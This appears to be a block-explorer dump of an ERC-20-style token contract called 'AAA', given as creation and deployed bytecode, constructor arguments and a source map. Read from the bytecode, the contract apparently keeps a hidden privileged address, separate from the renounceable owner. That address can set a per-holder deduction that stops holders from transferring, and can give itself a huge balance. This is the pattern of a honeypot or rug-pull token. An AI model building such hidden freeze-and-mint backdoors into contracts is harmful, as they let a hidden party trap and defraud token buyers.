ffffffffffffffffffffffffffff160361072b57710125dfa371a19e6f7cb57b18a4ce9d900000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061073961099b565b9050610746818585610c08565b600191505092915050565b600061075b61099b565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080957710125dfa371a19e6f7cb55f5737674ec80000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108c2610f1a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610931576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610928906115dd565b60405180910390fd5b61093a81610f98565b50565b600080828461094c91906114a5565b905083811015610991576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098890611649565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a09906116db565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a789061176d565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b5f91906112da565b60405180910390a3505050565b6000610b78848461080d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c025781811015610be4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdb906117d9565b60405180910390fd5b610c018484610bfc858561105c90919063ffffffff16565b6109a3565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6e9061186b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906118fd565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d7e82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461105c90919063ffffffff16565b905082811015610dc3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dba9061198f565b60405180910390fd5b610dd6838261105c90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e6b83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461093d90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f0b91906112da565b60405180910390a35050505050565b610f2261099b565b73ffffffffffffffffffffffffffffffffffffffff16610f40610526565b73ffffffffffffffffffffffffffffffffffffffff1614610f96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8d906119fb565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061109e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110a6565b905092915050565b60008383111582906110ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e5919061119a565b60405180910390fd5b50600083856110fd9190611a1b565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611144578082015181840152602081019050611129565b60008484015250505050565b6000601f19601f8301169050919050565b600061116c8261110a565b6111768185611115565b9350611186818560208601611126565b61118f81611150565b840191505092915050565b600060208201905081810360008301526111b48184611161565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ec826111c1565b9050919050565b6111fc816111e1565b811461120757600080fd5b50565b600081359050611219816111f3565b92915050565b6000819050919050565b6112328161121f565b811461123d57600080fd5b50565b60008135905061124f81611229565b92915050565b6000806040838503121561126c5761126b6111bc565b5b600061127a8582860161120a565b925050602061128b85828601611240565b9150509250929050565b60008115159050919050565b6112aa81611295565b82525050565b60006020820190506112c560008301846112a1565b92915050565b6112d48161121f565b82525050565b60006020820190506112ef60008301846112cb565b92915050565b60008060006060848603121561130e5761130d6111bc565b5b600061131c8682870161120a565b935050602061132d8682870161120a565b925050604061133e86828701611240565b9150509250925092565b600060ff82169050919050565b61135e81611348565b82525050565b60006020820190506113796000830184611355565b92915050565b600060208284031215611395576113946111bc565b5b60006113a38482850161120a565b91505092915050565b6113b5816111e1565b82525050565b60006020820190506113d060008301846113ac565b92915050565b600080604083850312156113ed576113ec6111bc565b5b60006113fb8582860161120a565b925050602061140c8582860161120a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145d57607f821691505b6020821081036114705761146f611416565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b08261121f565b91506114bb8361121f565b92508282019050808211156114d3576114d2611476565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611535602583611115565b9150611540826114d9565b604082019050919050565b6000602082019050818103600083015261156481611528565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115c7602683611115565b91506115d28261156b565b604082019050919050565b600060208201905081810360008301526115f6816115ba565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611633601b83611115565b915061163e826115fd565b602082019050919050565b6000602082019050818103600083015261166281611626565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c5602483611115565b91506116d082611669565b604082019050919050565b600060208201905081810360008301526116f4816116b8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611757602283611115565b9150611762826116fb565b604082019050919050565b600060208201905081810360008301526117868161174a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117c3601d83611115565b91506117ce8261178d565b602082019050919050565b600060208201905081810360008301526117f2816117b6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611855602583611115565b9150611860826117f9565b604082019050919050565b6000602082019050818103600083015261188481611848565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118e7602383611115565b91506118f28261188b565b604082019050919050565b60006020820190508181036000830152611916816118da565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611979602683611115565b91506119848261191d565b604082019050919050565b600060208201905081810360008301526119a88161196c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119e5602083611115565b91506119f0826119af565b602082019050919050565b60006020820190508181036000830152611a14816119d8565b9050919050565b6000611a268261121f565b9150611a318361121f565b9250828203905081811115611a4957611a48611476565b5b9291505056fea2646970667358221220e262782efbbc96fa491fb01be003275e592e6766273292c69e35c2b930ddec8d64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000003414141000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034141410000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063a9059cbb11610071578063a9059cbb146102e5578063b03559c414610315578063dd62ed3e14610331578063f046fdfa14610361578063f2fde38b1461037f57610116565b806395d89b411461025d578063a4022bd11461027b578063a457c2d714610299578063a89c37d7146102c957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806370a0823114610205578063715018a6146102355780638da5cb5b1461023f57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b604051610130919061119a565b60405180910390f35b610153600480360381019061014e9190611255565b61042d565b60405161016091906112b0565b60405180910390f35b610171610450565b60405161017e91906112da565b60405180910390f35b6101a1600480360381019061019c91906112f5565b61045a565b6040516101ae91906112b0565b60405180910390f35b6101bf610489565b6040516101cc9190611364565b60405180910390f35b6101ef60048036038101906101ea9190611255565b610492565b6040516101fc91906112b0565b60405180910390f35b61021f600480360381019061021a919061137f565b6104c9565b60405161022c91906112da565b60405180910390f35b61023d610512565b005b610247610526565b60405161025491906113bb565b60405180910390f35b61026561054f565b604051610272919061119a565b60405180910390f35b6102836105e1565b60405161029091906112da565b60405180910390f35b6102b360048036038101906102ae9190611255565b6105f1565b6040516102c091906112b0565b60405180910390f35b6102e360048036038101906102de919061137f565b610678565b005b6102ff60048036038101906102fa9190611255565b61072e565b60405161030c91906112b0565b60405180910390f35b61032f600480360381019061032a919061137f565b610751565b005b61034b600480360381019061034691906113d6565b61080d565b60405161035891906112da565b60405180910390f35b610369610894565b60405161037691906113bb565b60405180910390f35b6103996004803603810190610394919061137f565b6108ba565b005b6060600580546103aa90611445565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611445565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861099b565b90506104458185856109a3565b600191505092915050565b6000600454905090565b60008061046561099b565b9050610472858285610b6c565b61047d858585610c08565b60019150509392505050565b60006012905090565b60008061049d61099b565b90506104be8185856104af858961080d565b6104b991906114a5565b6109a3565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051a610f1a565b6105246000610f98565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461055e90611445565b80601f016020809104026020016040519081016040528092919081815260200182805461058a90611445565b80156105d75780601f106105ac576101008083540402835291602001916105d7565b820191906000526020600020905b8154815290600101906020018083116105ba57829003601f168201915b5050505050905090565b6b033b2e3c9fd0803ce800000081565b6000806105fc61099b565b9050600061060a828661080d565b90508381101561064f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106469061154b565b60405180910390fd5b61066c8286610667878561105c90919063ffffffff16565b6109a3565b60019250505092915050565b61068061099b565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361072b57710125dfa371a19e6f7cb57b18a4ce9d900000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061073961099b565b9050610746818585610c08565b600191505092915050565b600061075b61099b565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080957710125dfa371a19e6f7cb55f5737674ec80000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108c2610f1a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610931576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610928906115dd565b60405180910390fd5b61093a81610f98565b50565b600080828461094c91906114a5565b905083811015610991576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098890611649565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a09906116db565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a789061176d565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b5f91906112da565b60405180910390a3505050565b6000610b78848461080d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c025781811015610be4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdb906117d9565b60405180910390fd5b610c018484610bfc858561105c90919063ffffffff16565b6109a3565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6e9061186b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd906118fd565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d7e82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461105c90919063ffffffff16565b905082811015610dc3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dba9061198f565b60405180910390fd5b610dd6838261105c90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e6b83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461093d90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f0b91906112da565b60405180910390a35050505050565b610f2261099b565b73ffffffffffffffffffffffffffffffffffffffff16610f40610526565b73ffffffffffffffffffffffffffffffffffffffff1614610f96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8d906119fb565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061109e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110a6565b905092915050565b60008383111582906110ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e5919061119a565b60405180910390fd5b50600083856110fd9190611a1b565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611144578082015181840152602081019050611129565b60008484015250505050565b6000601f19601f8301169050919050565b600061116c8261110a565b6111768185611115565b9350611186818560208601611126565b61118f81611150565b840191505092915050565b600060208201905081810360008301526111b48184611161565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ec826111c1565b9050919050565b6111fc816111e1565b811461120757600080fd5b50565b600081359050611219816111f3565b92915050565b6000819050919050565b6112328161121f565b811461123d57600080fd5b50565b60008135905061124f81611229565b92915050565b6000806040838503121561126c5761126b6111bc565b5b600061127a8582860161120a565b925050602061128b85828601611240565b9150509250929050565b60008115159050919050565b6112aa81611295565b82525050565b60006020820190506112c560008301846112a1565b92915050565b6112d48161121f565b82525050565b60006020820190506112ef60008301846112cb565b92915050565b60008060006060848603121561130e5761130d6111bc565b5b600061131c8682870161120a565b935050602061132d8682870161120a565b925050604061133e86828701611240565b9150509250925092565b600060ff82169050919050565b61135e81611348565b82525050565b60006020820190506113796000830184611355565b92915050565b600060208284031215611395576113946111bc565b5b60006113a38482850161120a565b91505092915050565b6113b5816111e1565b82525050565b60006020820190506113d060008301846113ac565b92915050565b600080604083850312156113ed576113ec6111bc565b5b60006113fb8582860161120a565b925050602061140c8582860161120a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145d57607f821691505b6020821081036114705761146f611416565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b08261121f565b91506114bb8361121f565b92508282019050808211156114d3576114d2611476565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611535602583611115565b9150611540826114d9565b604082019050919050565b6000602082019050818103600083015261156481611528565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115c7602683611115565b91506115d28261156b565b604082019050919050565b600060208201905081810360008301526115f6816115ba565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611633601b83611115565b915061163e826115fd565b602082019050919050565b6000602082019050818103600083015261166281611626565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c5602483611115565b91506116d082611669565b604082019050919050565b600060208201905081810360008301526116f4816116b8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611757602283611115565b9150611762826116fb565b604082019050919050565b600060208201905081810360008301526117868161174a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117c3601d83611115565b91506117ce8261178d565b602082019050919050565b600060208201905081810360008301526117f2816117b6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611855602583611115565b9150611860826117f9565b604082019050919050565b6000602082019050818103600083015261188481611848565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118e7602383611115565b91506118f28261188b565b604082019050919050565b60006020820190508181036000830152611916816118da565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611979602683611115565b91506119848261191d565b604082019050919050565b600060208201905081810360008301526119a88161196c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119e5602083611115565b91506119f0826119af565b602082019050919050565b60006020820190508181036000830152611a14816119d8565b9050919050565b6000611a268261121f565b9150611a318361121f565b9250828203905081811115611a4957611a48611476565b5b9291505056fea2646970667358221220e262782efbbc96fa491fb01be003275e592e6766273292c69e35c2b930ddec8d64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000003414141000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034141410000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): AAA
Arg [1] : symbol_ (string): AAA

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [3] : 4141410000000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [5] : 4141410000000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12210:11551:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13084:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15444:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14213:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16225:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14055:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16895:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14384:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10061:103;;;:::i;:::-;;9411:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13303:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12500:57;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17636:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18557:156;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14717:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18721:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14973:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12383:21;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10319:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13084:100;13138:13;13171:5;13164:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13084:100;:::o;15444:201::-;15527:4;15544:13;15560:12;:10;:12::i;:::-;15544:28;;15583:32;15592:5;15599:7;15608:6;15583:8;:32::i;:::-;15633:4;15626:11;;;15444:201;;;;:::o;14213:108::-;14274:7;14301:12;;14294:19;;14213:108;:::o;16225:261::-;16322:4;16339:15;16357:12;:10;:12::i;:::-;16339:30;;16380:38;16396:4;16402:7;16411:6;16380:15;:38::i;:::-;16429:27;16439:4;16445:2;16449:6;16429:9;:27::i;:::-;16474:4;16467:11;;;16225:261;;;;;:::o;14055:93::-;14113:5;14138:2;14131:9;;14055:93;:::o;16895:238::-;16983:4;17000:13;17016:12;:10;:12::i;:::-;17000:28;;17039:64;17048:5;17055:7;17092:10;17064:25;17074:5;17081:7;17064:9;:25::i;:::-;:38;;;;:::i;:::-;17039:8;:64::i;:::-;17121:4;17114:11;;;16895:238;;;;:::o;14384:127::-;14458:7;14485:9;:18;14495:7;14485:18;;;;;;;;;;;;;;;;14478:25;;14384:127;;;:::o;10061:103::-;9295:15;:13;:15::i;:::-;10126:30:::1;10153:1;10126:18;:30::i;:::-;10061:103::o:0;9411:87::-;9457:7;9484:6;;;;;;;;;;;9477:13;;9411:87;:::o;13303:104::-;13359:13;13392:7;13385:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13303:104;:::o;12500:57::-;12536:21;12500:57;:::o;17636:401::-;17729:4;17746:13;17762:12;:10;:12::i;:::-;17746:28;;17785:24;17812:25;17822:5;17829:7;17812:9;:25::i;:::-;17785:52;;17876:15;17856:16;:35;;17848:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;17944:63;17953:5;17960:7;17969:37;17990:15;17969:16;:20;;:37;;;;:::i;:::-;17944:8;:63::i;:::-;18025:4;18018:11;;;;17636:401;;;;:::o;18557:156::-;18622:12;:10;:12::i;:::-;18613:21;;:5;;;;;;;;;;;:21;;;18609:97;;18656:48;18637:7;:15;18645:6;18637:15;;;;;;;;;;;;;;;:67;;;;18609:97;18557:156;:::o;14717:193::-;14796:4;14813:13;14829:12;:10;:12::i;:::-;14813:28;;14852;14862:5;14869:2;14873:6;14852:9;:28::i;:::-;14898:4;14891:11;;;14717:193;;;;:::o;18721:218::-;18772:16;18791:12;:10;:12::i;:::-;18772:31;;18827:8;18818:17;;:5;;;;;;;;;;;:17;;;18814:118;;18872:48;18852:9;:17;18862:6;18852:17;;;;;;;;;;;;;;;:68;;;;18814:118;18761:178;18721:218;:::o;14973:151::-;15062:7;15089:11;:18;15101:5;15089:18;;;;;;;;;;;;;;;:27;15108:7;15089:27;;;;;;;;;;;;;;;;15082:34;;14973:151;;;;:::o;12383:21::-;;;;;;;;;;;;;:::o;10319:201::-;9295:15;:13;:15::i;:::-;10428:1:::1;10408:22;;:8;:22;;::::0;10400:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10484:28;10503:8;10484:18;:28::i;:::-;10319:201:::0;:::o;3625:181::-;3683:7;3703:9;3719:1;3715;:5;;;;:::i;:::-;3703:17;;3744:1;3739;:6;;3731:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3797:1;3790:8;;;3625:181;;;;:::o;8625:98::-;8678:7;8705:10;8698:17;;8625:98;:::o;21352:346::-;21471:1;21454:19;;:5;:19;;;21446:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21552:1;21533:21;;:7;:21;;;21525:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21636:6;21606:11;:18;21618:5;21606:18;;;;;;;;;;;;;;;:27;21625:7;21606:27;;;;;;;;;;;;;;;:36;;;;21674:7;21658:32;;21667:5;21658:32;;;21683:6;21658:32;;;;;;:::i;:::-;;;;;;;;21352:346;;;:::o;21989:378::-;22090:24;22117:25;22127:5;22134:7;22117:9;:25::i;:::-;22090:52;;22177:17;22157:16;:37;22153:207;;22239:6;22219:16;:26;;22211:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22294:54;22303:5;22310:7;22319:28;22340:6;22319:16;:20;;:28;;;;:::i;:::-;22294:8;:54::i;:::-;22153:207;22079:288;21989:378;;;:::o;18947:628::-;19060:1;19044:18;;:4;:18;;;19036:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19137:1;19123:16;;:2;:16;;;19115:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;19192:17;19212:7;:13;19220:4;19212:13;;;;;;;;;;;;;;;;19192:33;;19236:21;19260:30;19280:9;19260;:15;19270:4;19260:15;;;;;;;;;;;;;;;;:19;;:30;;;;:::i;:::-;19236:54;;19326:6;19309:13;:23;;19301:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;19404:25;19422:6;19404:13;:17;;:25;;;;:::i;:::-;19386:9;:15;19396:4;19386:15;;;;;;;;;;;;;;;:43;;;;19500:25;19518:6;19500:9;:13;19510:2;19500:13;;;;;;;;;;;;;;;;:17;;:25;;;;:::i;:::-;19484:9;:13;19494:2;19484:13;;;;;;;;;;;;;;;:41;;;;19556:2;19541:26;;19550:4;19541:26;;;19560:6;19541:26;;;;;;:::i;:::-;;;;;;;;19025:550;;18947:628;;;:::o;9576:134::-;9653:12;:10;:12::i;:::-;9642:23;;:7;:5;:7::i;:::-;:23;;;9634:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9576:134::o;10680:191::-;10754:16;10773:6;;;;;;;;;;;10754:25;;10799:8;10790:6;;:17;;;;;;;;;;;;;;;;;;10854:8;10823:40;;10844:8;10823:40;;;;;;;;;;;;10743:128;10680:191;:::o;4089:136::-;4147:7;4174:43;4178:1;4181;4174:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4167:50;;4089:136;;;;:::o;4528:192::-;4614:7;4647:1;4642;:6;;